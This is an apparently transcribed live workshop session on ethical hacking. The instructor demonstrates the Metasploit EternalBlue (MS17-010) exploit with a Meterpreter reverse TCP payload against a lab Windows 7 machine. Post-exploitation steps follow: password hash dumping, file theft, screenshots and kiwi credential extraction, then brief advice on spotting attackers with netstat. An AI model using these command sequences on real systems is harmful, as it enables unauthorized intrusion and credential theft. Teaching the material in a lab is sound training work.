but today we are using other activities as well. So all the scripts regarding exploitation comes under exploit scripts. Other scripts like port scanning, vulnerability scanning, password cracking, brute forcing, all those scripts come under auxiliary scripts. Similarly, anything that you do after exploitation, like privilege escalation, creating backdoor, clearing footprints, all those things will come under post scripts. And payloads are the scripts which is used to do a specific task after gaining access on the victim machine. Okay. Next comes encoders. Encoders are the kind of scripts which will use to encode data. By default, your data would go in a plain text. That is, your scripts will go in plain text. In order to encode them, we use encoders. NOPs, basically, it's similar to your academic NOP, that is no operations, which is used to generate delay while exploit development. Last comes evasions. Evasions are typically used to bypass your antiviruses. Okay, as simple as that. Now let us, before going and exploiting the machines, let us see a bit of theory behind this exploiting of a remote code execution vulnerability. Okay, so it's going to be, I'm going to keep it very short and sweet so that we can clearly understand this. Okay, because my theory is that you should never run any tool or any exploit until you understand what is running in behind of that. If you run anything blindly, that means you're a script kiddie, right? So you should be a professional person while performing any attack. So let us understand how a typical exploit works. So just to give an understanding, I'm using a few slides here, approximately 2 or 3 slides. That's it. Assume here, in this case, assume that the right system is a target computer, the left computer is a hacker computer. Assume that a target computer is running a vulnerable service, a remote code execution vulnerable service on port 80. Okay, which means what is the characteristics of this vulnerability? The characteristics of this vulnerability is basically so if this vulnerability can be after exploiting this vulnerability, the attacker can execute any code that he wants. Clear? So to exploit any remote code execution vulnerability, the hacker will have to program, he will have to write codes, and then he has to send it to the victim computer, and this victim computer will start executing the code which was sent by the hacker. And that's how we gain control on the victim machine. Clear? So in this process of compromising a machine through remote code execution, you will come across 2 parts of code, which means a hacker will have to perform exploitation with 2 codes. So hacker will have to develop 2 codes and need to exploit that victim machine. So what are the 2 parts of code here? The part of code is you will have to write one part of code called exploit, and second code which is payload. So what does exploit code contains? Exploit code contains the instruction to exploit a vulnerability. So exploit code contains the instruction to exploit a vulnerability, to break a vulnerability. Okay, so you will send this packet and you will send it to the victim, and as soon as this code gets executed, it will break a vulnerability. So what happens after breaking a vulnerability? So why do we need to break a vulnerability? Because we want the access of the victim machine, isn't it? Right? So what happens in the payload? In the payload, the attacker will program in such a way, or he will write a program in such a way, when the payload code gets executed, the victim system should hand over the system control to the attacker. That is what the instruction you will write in the payload code. Instruction to give victims access to the attacker. So always remember, when you're exploiting a remote code, 2 parts of code. First part of code is called as exploit. Second part of code is called as payload. Exploit code contains instruction to exploit a vulnerability, whereas the payload codes contains the instruction to give victim computers access to the attacker. So what happens is when you run this particular exploit code, so the exploit code and payload code will go together. So obviously this cannot be depicted in practical because this happens in a fraction of seconds. So your exploit code and payload code will go together to the victim computer. Let me put it this way. Mistake. We copy paste it and use that with a paint so that we can clearly depict this way of flow. Okay. So what happens here is both exploit code and payload code will go together. You will hit your target. And what exploit code will do is it will first break the vulnerability and it will start executing the contents of the payload. So what have we written in the payload? We have written the code, we have written the instruction to give the system access to the attacker. Okay. So hence payload code and exploit code together will give the system's access to the attacker. Whereas exploit code contains the instruction of breaking a vulnerability, whereas payload code contains how the system's access can be provided back to the attacker. As simple as that. Okay. So hope the theory behind attack is pretty much clear. Please know if you have any query. Okay. There are a couple of queries. What is CGI in programming? It's common gateway interface. So basically, in web programming, what happens is when you raise a request, so when you basically make a HTTP request, each and every activity that you do on web browser, it is converted into a web request, and the web request will hit the server. So CGI programming or CGI is basically which is a actual processor which will be receiving actual processing unit in your server, which will receive your request, process the request, and send you the response. So the actual brain of a generic web server is done by your CGI or common gateway interface. So again, while doing programming, you have to program your server in such a way as your requirement. So in case if you want to block certain activities, you can define that. If you want to enable certain activities, you can enable that. Okay, so that's what technically we do in CGI. What are the hands-on sessions mentioned in schedule? So currently, whatever you're doing, basically that would be your hands-on. We'll be working on with Metasploit, and we'll be seeing about how do you hack a computer, how do you gain control of a computer, which we'll be seeing in a couple of minutes. Okay, so is it feasible to know original IP address of hackers? If yes, no, yes, how? I'll come to that in a while because anyhow we'll see how to hack. So the moment I perform hack, I'll show you the victim computers. I'll log into the victim computer and I'll show you how is it to see the victim computer after being hacked. That time I'll show you how do you identify what is the attackers, how to find out attackers IP address. Okay, I'll show you while doing the practicals. Clear? Hope that so far the queries are pretty much clear. So let's go forward. So now we have understood the theory behind how a remote code execution works, and we have enough amount of information about our target. Okay. So if you recall, while explaining, I said that we'll be performing hack across two computers, Windows and Unix. First, let me with a vulnerability.
Sir.
And this is the vulnerability code. Sorry, ma'am, come again.
Your voice is breaking.
Okay, so I think, okay. Is it audible now? Is it clear now, or you're still facing issues?
Continue, sir.
That's fine. Yeah, thank you. So yes, thank you for notifying that. And yes, so far we know that our victim computer is vulnerable with some vulnerability, and through vulnerability scanner, we know that what its vulnerability code is. Okay, so now we know that those many information. Now let's directly go to our Metasploit and search for the script. We'll import the script, configure our script, and then run it towards our victim. Okay, so let me show you just to show you the hint of our victim computer. Let me connect to my victim computer and show you. This is my victim computer, which I'm going to be hacking in a while. Okay, this is simply running nothing in it, right? It's a completely idle mission. You can go task manager and see there's nothing running in it, literally. Let me minimize it and see how can I hack this. So obviously Metasploit contains a huge amount of scripts. We saw that there are like 2000 plus scripts, isn't it? So it's not possible for us to call the script, to memorize this path. So what we do is we use the search operation available in Metasploit. So we'll use search space the vulnerability code. That will give you the list of all the scripts related to that vulnerability. Clear? So where I just did search space vulnerability code number, it listed us the different scripts that is responsible or that is related to that particular vulnerability. What I said is exploit-based scripts. Well, explaining about different categories of script, I said exploit scripts are the scripts which is used to break a vulnerability, isn't it? Whereas auxiliary-based scripts are the scripts which is used for miscellaneous purposes like port scanning, vulnerability scanning, others. Which means if you want to gain control of your target through exploiting a vulnerability, you always look for scripts that is starting from exploits. So in this word, if you look up into all the scripts, there are two scripts that is starting from auxiliary, which is used for vulnerability scanning. And there are three scripts which is starting from exploits, which means these are the three different scripts which I can use for exploiting my vulnerability or the identified vulnerability. But there's three scripts, which one to choose? That's the hectic job, because a lot of time Metasploit gives you multiple results when you search for a vulnerability, but which one to choose would be confusing part. So what you do is, best way is Metasploit has this info option where you can go through the information of the script. So what you do is click on info, type info, space, copy the path, copy the path and hit enter. So what happens here is this will give you details about this particular script. Okay. Similarly, look for the details of each script. So read the info of first script, read the info of second script, read the info of third script. Whichever details matches your scenario, use that. Now, what are information that will it give me? It gives us information saying that on which platform. So first it gives you the name of the vulnerability or name of the exploit, the path of the exploit, which platform does this exploit work on. So currently this exploit will work only on Windows platforms. Do we get, so privilege says that, do we get administrative access if you after exploiting this vulnerability? If it is yes, that means you'll get administrative access. If it is no, that means you will not get administrative access, you will get a normal user level access. Next comes is available targets. So you have to clearly see this particular part. Available targets part clearly specifies that on which target missions this attack will work. In our current case, this attack will work, this exploit will only work on Windows 7 mission or Windows Server 2008 mission, which is made up of a 64-bit architecture. So this exploit will only work on 64-bit Windows 7 mission. If your target is Windows 8 or 2012 or Windows 10 or Windows Server 2016 machine, even though it contains a vulnerability, this exploit will not work. Why? This exploit was built specifically on targets like Windows 7 and Windows Server 2002. So hence, this exploit will work perfectly for our current scenario, because our current scenario victim mission is nothing but Windows 7 build 7600, and is obviously a 64-bit mission that we have identified through our enumeration part, isn't it? So this is where your enumeration plays a very key role in your attack. Clear? So what we did now, so out of 3 scripts, we have identified our first script is works perfectly well for our given scenario. Similarly, you can find the information of other two where the current scenario I'll be skipping up. Okay. So what I recommend is first search a given keyword. You'll get a list of scripts. If you get multiple scripts, then go through info, validate if the scripts matches your current scenario. Even if you get a single script, again go to the info, see if all the details matches your current scenario or not. If and only if the script, the details matches the current scenario, only then run the exploit. Unless until you know what you're running, do not run the exploits. Clear? So let's go forward. And apart from this, it will also contain few basic options. Basic options clearly means that what all information that you need to provide in order to exploit this vulnerability, exploit this particular attack. Okay, so here we have 4 columns. So I'll come across this while configuring this particular exploit. Okay, next comes a description. So payload information check support is not much required in a case. So description clearly tells you that what this vulnerability is and how this exploitation works. Pretty simple and straightforward. Okay, so now we know enough information, and we also know that what is the path of our exploit. Now we need to import the script and we need to exploit that script. Import, configure, and execute a script. So the command to import a script, very simple. Just type use space path of the script. As simple as that. So first you need to search the keyword. You will get a path. Then you info space path will give you the information of the script. Use space path will import that script into your console. Okay, just give me a sec. Let me unset this basic thing so that it does not give me error in future. I'll tell you what is that. Okay, so use space path will give you the will import that particular script. Now we have imported the script. Now we cannot run the script blindly, isn't it? You have to configure it. To configure it, we need to see what are the information that is required. To see what all information are required for this exploit to work properly, hit the command show options. By this command, it would give you the list of options that is required for this particular attack or exploit to work. As simple as that. So it has 4 columns. First column, name, indicates the name of that particular option. Second column, current setting, gives you the current setting or current value of that particular option. So by default, few options will be having its own default value. Like in this case, the R port has 445, but R host is empty, which means by default, few options will have some default value, few may not have. Okay. Third column tells you the required bit that clearly tells you whether this option is mandatory or optional. If yes, that means it's mandatory. If it is no, that means it's optional. So currently, R port is mandatory, whereas SMB domain or SMB pass is optional. The next column is description. Description gives you some description about the particular option. So in a simple words, the first column is option name, second option is option value, third column is whether the option is mandatory or optional, fourth column is description of that particular option. Clear? So if you summarize, the only option that is mandatory but which is not available currently is rhost. So the only options that are mandatory is rhost, rport, verify R, and target, where all the options are set to default. Rhost indicates that it's the target IP address. Rport indicates that it's the target port. If you recall that our vulnerability did existed on port 445 only, isn't it? See, it was already on port 445. So you have to make sure our port is configured to 445, and our host should be the target's IP address. So how do I set the target IP address here? Very simple. In Metasploit, whenever you want to set a value for option name, you just need to provide set space option name space option value. Now, what was option value? It was 192.168 or 43 or 120, which is nothing but my Windows machine's IP address. Yeah. So when I do that, it gives me, it echoes back if I efficiently set up the value. To verify whether the given value has been appended or not, you can again hit show options, which gives you the given value. So if you observe, all the options our exploit is well configured. That means the first part of our code So in our exploitation, we required excuse me for that. So in our overall attack, we had two parts of code, isn't it? Exploit and payload. You have successfully configured the exploit code. Now we need to configure the payload part of the code. So the payload part of the code is very simple. So first you need to check what are the compatible payloads. For that you can use show payloads. It will give you a huge list of payloads. There are different varieties and different functionality of payload, but most of the time we require a payload which is used to gain control on the victim machine in an efficient way, right? So the best payload for that purpose you can use is set payload, and this payload only works for Windows-based machines. It does not work on Linux-based machines. For Linux-based machines, there are different set of payloads. Okay, this payload, that is Windows x64 Meterpreter reverse TCP, this is the best payload for this particular exploit to work properly. And how to identify which payload works perfectly for which exploit, that comes up through practice. So you need to work on, you need to try and error, and obviously I've showed you about what is the way to identify compatible payloads. So you need to work on that, and as you practice, as you go on practicing, it will give you a more clear, efficient way. Okay, so next let me import it. So import a payload, it's very simple. Set payload space path of the payload. Hit enter. Again, now it has imported payload. Obviously, payload will be having its own set of options, right? So payload has again the same thing: payload name, option value, and mandatory or optional and description. Currently all the options have been by default you have set. LOS is attacker mission. So basically, what this reverse TCP payload will do, in sense, after exploitation, it will forward the attacker mission's access to the victim machine. So it will send the victim's mission access to attacker machine post the exploitation. Here, as simple and straightforward it is. Clear, guys? Now we have successfully given all the details. We have imported the payload. We have imported the exploit. Always make sure the L host is attacker mission's IP address. Always remember, in almost all the attacks, R host indicates the victim mission's IP address. R port indicates the victim mission's vulnerable port. L host indicates the attacker mission's IP address. L port indicates on which port of the attacker mission the communication has to be carried out. Okay, as simple as that. So once all the information has been perfectly appended, then hit exploit. So exploit is a command to run or execute a particular exploit. As simple and as straightforward it is. Click on enter and sit back and relax. All the attack will be happening. So the machine will send the exploit code, break the vulnerability, and it will send the payload code. Once the exploit code gets executed, it will send the payload code and get the session and give you a prompt saying that we have got a session. And within around like 10-15 seconds, the entire attack has been completed. And that's how we see this console saying that win. And from this particular console, we clearly see that we have got a Meterpreter access. Now, what is the meaning of Meterpreter access? So, Meterpreter is an interpreted command line interface on your Metasploit. So, Metasploit has, obviously, it is used for exploitation framework. Now, if you're trying to hack a Windows machine, then tomorrow you try to have a Linux machine, tomorrow you try to hack a Mac machine, you need to go across various tools, various command line interface, and so on, right? And obviously, you have to do file transfer, to upload and download files. All those things had to be maintained manually. So what Metasploit came up with is, it comes up with an interpreted command line through which you can run basic Linux command itself on all your targets. And along with the Linux command line, it will also allow you to upload, download files, and also do a lot of other different activities on Meterpreter. So through Meterpreter it's a command line access on your target mission after compromising a target, so that you can run various, where you can execute various tasks on this particular mission, on this particular target victim mission. Which means instead of running CMD or instead of so obviously you'll be controlling the target. So obviously when you have command and access, you have to type everything on Windows command, right? So instead of running all the Windows commands for your activity, you can run metapletter based commands. Okay, you can run metapletter based commands, and through this metapletter based command, you can execute a particular task. Okay, it has its own set of commands. Okay. Okay, so a couple of queries recording videos. It's great. Okay, so that's great. So let's go forward. So now we have, I say that we have systems access. Let us see that. You can run a specific commands on Metasplitter. Metasplitter has its own set of commands. To get those commands, type help in the screen. Okay, by typing help in the Metasplitter, you can get all the commands that can be run through Metasplitter. You can upload files, download files, you can kill applications, you can execute an executable, you can record the webcam, you can record the screenshots, all those things can be done. But as I said, you need to work on this to get more and more used to it. So it's a bit laggy. Let me. Wonder why the system is laggy a bit. Let me close these things. Okay, so you can use help command to start this help. So let me see, the system is pretty easy. Let me open up another instance. Why it's giving me delay at this particular time? It's not the issue with my system. It's the system with my Linux. That's great. Let me turn off the unnecessary activity. It's the issue with my Linux, not my Windows machine. So just give me a sec. Let me start it again. So it's giving me an error again. So I hope the attack scenario is pretty much clear so far. So let me know if you have any queries regarding attack scenario. Okay, there are a couple of queries. Queries. It's great. Let me try if I can execute commands. It's restarted. It's great, no problem. So my system gets, oh, that's perfect. It's executing the commands now. So let me write sysinfo. That's perfect. That's perfect. It's a system issue. Okay, perfect. So since I have got access on this victim mission, you can use help command to see all the commands that is available in Metasploit, or that is available to execute in Metapletter. Let me show you a few commands. When you use sysinfo, always when you compromise a mission, make sure you get some information about the target mission. So you can use sysinfo command to see the list of the information about the victim computer. So it's Windows 7, 64-bit machine, the system is Windows 7, and so on. You can use hashdump to list the users' hashes, password hashes. It will give you all the list of all the usernames and password hashes. You can see there are two normal users, BQB and Windows 7. Okay. Similarly, you can go to the file system and see all the files. Let me see. You can see the files. You can do upload and download files. Just for a purpose, you can navigate to the system by using pwd, dir, and so on. Let me redirect to desktop and upload a file that is a proof of concept. And let me see. This is okay. Desktop. And now you can see all the desktop files. Let me open up another instance and see what system files I have, so that I can upload my files. Let me do that in the system. So just give me a sec. Let me upload a text file. me. And so I'm creating a normal text file. You're hacked in my other computer. So let me upload a text file. So click upload. So I have a text file created already in my system by name view me. It upload to my current working directory. You can see this is my desktop. There's no files here. Let me upload this. It is uploaded, and you can see the viewme.txt. This way you can upload any files. Hey, or hacked, right? Similarly, you can upload and download files. Similarly, let me copy paste and edit this as secret and type my secret number. Okay, so just like you have uploaded the file, you can also download the file. You can list all the existing files using ls. Now you can just go on download, which will, oh, my mistake, download space the file, will download the file on your system. Just to show you, let me open another instance. Make sure you never exit out of the metapreter, because that is a different set of command line. You cannot view those contents. You cannot go outside just by, well, the moment you go outside, your access will go out. Let me show you that. You can see the cat secret, the file that we have captured from our victim nation. So it is just a combination of basic Linux commands and download here. Okay. So now we have a valid proof. So not only this, you can also take a screenshot of victim computer desktop. Okay. So and file will be stored. So let me use my Python listener to just show you the screen. Simple. Okay. HTTP server port 80. Okay, so I can show you the screen by my browser. So whatever image that has been captured, that is visible on this particular screen under, what's my mistake? So it should be, oh yeah, screen. You can get the file name in the console itself. The file name is /root/IXLPODB. So let me go to /root. /root. I think I'm in whose directory? Root directory. Yes, oh sorry, my mistake. I'm not in /root. I'm in root. Let me move myself into /root and then hit the command so that I can do the file. Perfect. So I should be able to see the file. File name IXL, right? Here it is. This is my current screenshot. Screenshot of my current desktop, right? Similarly, we can record their webcam, record their chats, what they're using, what they're typing, what are the stored password in your system, all those stuff, right? So you can typically use import or say import kiwi, right? Load kiwi, my mistake, and just put for the kiwi is an extension. Just add credits underscore all, and will give you all the credits inside the system. So currently this system does not have any other credentials except its password. You can see the system's password is Windows 7. So similarly, once the system is compromised, you can use Kiwi and other tools to download or dump the system's password and use it for later purpose. Okay. So it was pretty much clear regarding how to exploit a machine and what are the different ways to show the proof of concept into it. Any queries so far, guys? Again, it was kind of yes, it was pretty much straightforward, and yes, it was. It contains a lot of commands. So what I'll do is I'll type in all the commands, and I will be into this particular document, and let me share it with you guys so that we can recall all the commands that we did. Okay. So that's one of the way how you can compromise a mission. If you recall what we did right from the scratch, is that we first we started our information gathering. That is, we started with port scanning. We identified what ports are open and what services are running first through Nmap. Later, we identified that what ports are leaking some information like the operating system version and few more information like FTP, all those things, FTP version, all those things. And later we went into we used vulnerability scanner to scan for the known vulnerabilities, that is using Nessus, right? So Nessus gave us pretty much straightforward information that how to find out the critical vulnerabilities, and it also gave us which tool can be used to exploit a vulnerability along with its vulnerability code. Later, once we got the vulnerability code, we used Metasploit. We started Metasploit, and later after starting Metasploit, we first searched with a given keyword that is nothing but our vulnerability code. And after providing the vulnerability code and searching in it, we got as a response we got few exploit scripts and auxiliary scripts. So since we got 3 exploit scripts, we use info space the path of the script to get the accurate, to get some information about the script. From the information, we came to know which is the exploitable missions, what are the different exploitable target missions, what options are required to exploit, and various other configuration options. And using use space path, we imported our particular exploit. And later, after importing exploit, we use show options to view all the required options to be configured to make the exploit work. Once we configured our exploit, we went to we imported our payload and we configured our payload. After successfully importing and configuring our exploit and payload, we then executed our attack. So after executing our attack, we had used a metapredator payload, so hence we got a metapredator session where it has a wide variety of commands to exchange and to hack into people's accounts and their details, the system details, system data, with which we were able to upload and download files, and we were able to get the passwords, we were able to get the screenshot of our systems, we were able to download all the other system files as well, and dump password hashes as well. Okay, so that's why one of the proof of concept of this particular attack. Okay, so again, because of current time constraint, I don't think I'll be able to do a Linux exploitation today. So we have the same process for Linux. So it's hardly like it will consume another 15 to 20 minutes. Let's say if I can do that tomorrow, I'll include that as a part of tomorrow in the earlier part. So there's one difference. You just need to use the different exploit for that purpose, and that's it, right? So there was a different kind of exploit and payload path for Windows. There'll be a different kind of a payload exploit and path for Linux. There's only difference. Clear? So this is the overall summary of what we did today. So we have another 12 minutes. If you have any queries regarding whatever we have discussed today, it could be about we were discussed about how to do port scanning, vulnerability scanning, the tools, respective tools, how to identify those information. When you get the output, how do you understand those information? All those things we have understood there. So we also understood about how do you exploit a particular vulnerability. That also we saw. So similarly, you can use the exact commands and the exact methodology can be literally used on any computer in the world, unless until you have some vulnerability in it. Okay, so this we exploited with the help of a remote code execution vulnerability. We can typically use a similar kind of attack even on a command execution vulnerability as well. Okay, so hope so far it was pretty much clear. If you have any queries, please punch in the query in the chat box. There was one query to identify the attacker. You can see I'm still connected to the victim computer. I'm still hacking it. I can still execute commands. Get UID will give me user ID, which means the attacker is still in touch with victim. So as I said, the best way to identify who the attacker is, just go to command prompt. If you recall, I use netstat command, right, to check your network activity. You can typically use the same connectivity, the same methodology. Then what you need to look for is look for all the connections that is established between your computer and foreign computers. In this case, in my computer, there are only two entries, isn't it? Who are in, who are in touch with my computer and my other computers. So if you see from here, we can clearly identify which port and which service are being used. Okay, so first look into your address. So in your address, you have the two out of two connection, one connection, the port belongs to vendor specific port. Remember, 3389 is a port belongs to vendor specific port. How do I identify that? Through our given chart. So if you remember, in a text file, we have shared the port ranges, isn't it? So 3389 comes up here, which means the port that is used is a vendor specific port on your computer. So obviously it could be an official way. Go for the next. The next port is a dynamic port, isn't it? So that means you are a client. The victim is a client. In that case, go and search which is the foreign address. So this IP address is the attacker's IP address. Okay, you cannot come to the complete conclusion whether the IP address is an attacker or not. So what you need to do is go to various IP learning website like myip.ms or go to IP2 location. Identify whose IP address is this. Okay, in this case, if you put 192.168.43.7, obviously it will show as private IP address. It's one of the IP address in my own network. From this, I can easily conclude that one of my neighboring computer is the actual attacker. Okay, so via this way, via netstat, by understanding what all the network activity that is happening on my computer, I can easily find out which is an official packets and which is unofficial packets. Clear? So when someone is trying to hack you, obviously your port number would be client port, sorry, dynamic port, and this port number would be some port number. So kindly Google out for what port number is that. Obviously there will be huge amount of malwares which will be used, which will be affected. So see if that port number is a malware or not, and also look out for the IP address. If you get an IP address belongs to Google or Facebook or whatever legal websites, then it's okay. If it belongs to some malicious website, that will be listed or prompted out by year. So the blacklisted IP address will be identified here, or it will be identified by year. In that case, you can come to a conclusion that it's a malicious IP address. As simple as about that. Okay. So hope that was pretty much clear. So let me clarify a couple of queries. There are a couple of queries. Again, I hope it was pretty much clear for everyone. The topics that we've discussed, the examples I gave was pretty much clear, I hope. So let's clarify a couple of queries. The query goes like this. Very informative session, sir. One day I had an idea about theory of vulnerabilities in post scanners, but today only practical demo. Thank you for the compliment. The query, it was great session, sir. Do all 65,005, it's basically 65,535. It's 65535. Okay, and we use R as there are few well-known ports. Yes, you can. So practically speaking, we will not come across a practical usage of all the ports at the same time. Such amount of ports is given for a purpose, so that in case if you are a server, you can handle so much users at a consecutive amount of time. That is the reason 65,535 ports are given. But in real world, you will never use 65,535 ports. You will not even use 1,000 ports at a given amount of time, right? So we will no longer go behind 65,000. These numbers are just given for a purpose so that there will not be any collision between two different communications, or while initiating communication, or while serving any services. That's the reason that there is so much amount of port numbers. Here, another query is recent data breaches is identified in Google Chrome, which means what are the consequences will happen. Okay. So Google Chrome is also an application. Obviously, it's a user-end application. There are possibilities. See, Google Chrome runs in your computer as a client. That means there are multiple things that Google Chrome will do. It will send its information to its server. Second thing, whatever code that is your add-on is nothing but a code. Whatever you whatever you run on a browser, JavaScripts are nothing but code. So there are two cases that can happen if there is any vulnerability in Chrome. One thing, your data which is stored on your browser, your username, password, your cache, your history, your stored passwords, your browser history, all those things can be leaked, and attacker can get those things. Second thing, if there is a remote code execution vulnerability identified in Google Chrome, In that case, hacker could use Google Chrome as a medium and hack into your computer, which will obviously get all your file system data in it. Okay, so these are the two things that can happen if Google Chrome in the Google Chrome data breaches. Second thing, Mrs. came to Mrs. Okay, came to know about Mrs. That's great, really great. And thank you for we've got an idea about vulnerabilities and how to use it. Perfectly, thank you for that. And thank you for compliments, guys. Which is a better platform for Metasploit Linux or Windows? To answer that more frankly, I'm more sort of a Linux guy, as I said in the very first early part of the session. I'm more sort of into a Linux. This Windows machine that I'm using is my professional machines that I use only for screen sharing purpose. Except that I always go behind Linux, and for any hacking tools, I would never prefer a Windows machines. The reason is because when you install hacking-based software on Linux on Windows-based machine, you will have to by defaultly turn off your antivirus, and you will have to turn off your firewall. So obviously that those two will harm your computer much. That's the reason it's always better to run any hacking tools. It could be Nmap, it could be Wireshark, it could be Metasploit, all those things. It's better to run always those things on Linux platforms. No, don't run it on Windows. If at all, if you're much more efficient and if you're more into Linux, Windows, then obviously you will have to take the risk. It's great. Thank you for that part. And it's great. Thank you for your compliments, guys. And like, query, can Linux in virtual machines work as effectively as a normal mode for hacking? Obviously, yes. Around like 99% of the time, your Linux virtual machine will work perfectly fine for all the hacking practices. There are a few cases like while doing Wi-Fi hacking or while working up with hardware devices is where you face issues. But for all the simulated attacks, virtual machine will work perfectly fine. When you're using hardware devices for hacking, that time you will face issues through Linux machines running through virtual network, virtual connections. Okay, that's great. I hope so far. I hope all the queries are pretty much clear. Please let me know if you have any queries, guys. We have another 4 minutes left. Meanwhile, if you have any queries, please let me know the queries in the chat box. Any other queries, guys, or any other things that need to be improved or anything like that? Please let me know that. So yes, I'll be uploading this text file drive. So let me do that yourself. So Metasploit command. Let me put up Metasploit commands. Meanwhile, you can punch in the queries. I'll complete the commands. And first we did so whatever I put in a hash symbol that belongs to normal command prompt, and whatever I put MSF and greater than symbol, that would be a part of Metasploit framework. Okay. Use this command service space PostgreSQL space start. Until now, this part everything is run on a system command console, and anything that comes after MSF, so whatever I run as this, which are the commands that you need to run inside Metasploit. So we use MSF 0, then we use MSF part, we use info space exploit slash Windows slash SMB slash MS17-010 underscore 01 010 underscore eternal blue. Okay. Okay, so we use the same path. So info will give you the information of this particular exploit, and u space path will import the exploit. So when I say MSF slash, this indicates that you're part of exploit. Okay, so here we used show options to view the options, and then we use this set our host space victims IP, and then we used show payloads to view all the payload, and we used set payload space windows slash x64 slash meterpreter slash reverse underscore TCP, and then we used a set lhost to attacker IP, and set lport into attacker port. You can typically use any open port. And finally, we use exploit. So after this, you will have to run all the metasploit related commands. After this, you'll get something like this, where you will have to use sysinfo to get the system information, and get UID to get user ID information, load kiwi, and creds underscore all to get the passwords. Yeah, so those are the commands. Yes, I'll upload. I mean, let me do one thing. Let me let me export this into a PDF, and I'll put it into Drive and I'll show you guys a link. Is that okay, guys? Ma'am, is it okay to do that? So I'll what all the things? Yeah, what all the
also will be shared with them in the YouTube channel, so they should be able to access these as well.
Okay, I'll do one thing. I'll just have exported this. Let me stop my screen sharing and I'll upload into a Drive. Okay, so which day shall I, shall I upload it onto the Daylight Drive whose account have currently logged in?
Sure.
Okay, I'll do one thing. I'll stop my screen sharing. Let me upload this onto Drive and share you guys the link. Later, ma'am will append the same link onto the YouTube description of today's video so that you'll all be able to get the content. I think that works fine in that case.
Yes, I think.
Yes, sir. So I think I've done first session. I think there's not much query.
Bharat to me. Then you can share it to Madam, and Madam can share it to all the participants.
Sure, sir.
Yeah. And thank you, Bharat, for this wonderful session. It was a great learning for the past 4 hours, and hats off to your energy as well. So thank you so much. And ma'am, can we end for the day?
Yes, sir, definitely, sir. I thank both Sridhar and Bharat for making it very, very, a very wonderful learning experience for all the participants. I think they have got very good takeaway from the day 2 sessions. I thank the resource persons. I thank Sridhar sir. I thank all the participants for very actively participating in this session, a marathon session, I would say. And hats off to your energy levels, sir, Bharat sir, because we faculty members have 2 hours class at the max, and then we take a break. Anyway, thank you so much. I think tomorrow the same thing will continue. I think we have the sessions will start from 2 p.m. Sridhar sir, I hope I'm right.
Correct, ma'am. 2 o'clock. Yeah.
Yeah. So all of you, I wish all of you a great evening. Thanks all. Thanks again.
Yeah. Thank you, ma'am. Thank you.
We'll meet tomorrow. Thank you, Smile.
Yeah, thanks.